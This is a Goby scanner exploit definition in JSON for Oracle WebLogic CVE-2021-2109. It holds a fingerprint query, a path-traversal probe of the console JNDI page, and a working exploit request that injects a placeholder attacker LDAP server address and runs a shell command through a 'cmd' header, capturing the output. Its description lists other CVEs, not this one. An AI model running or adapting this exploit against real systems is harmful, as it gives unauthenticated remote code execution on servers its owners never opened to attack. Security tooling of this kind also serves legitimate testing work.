{ "Name": "Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"", "Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0", "Product": "WebLogicd", "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html", "Author": "PeiQi", "Impact": "

咩咩咩🐑

", "Recommandation": "", "References": [ "http://wiki.peiqi.tech" ], "HasExp": true, "ExpParams": [ { "name": "Cmd", "type": "input", "value": "whoami", "show": "" }, { "name": "Ldap", "type": "input", "value": "ldap://xxx.xxx.xxx;xxx:1389", "show": "" } ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "JNDI", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)", "follow_redirect": true, "header": { "cmd": "{{{Cmd}}}" }, "data_type": "text", "data": "" }, "SetVariable": [ "output|lastbody" ] } ], "PostTime": "2021-01-22 13:55:45", "GobyVersion": "1.8.237" }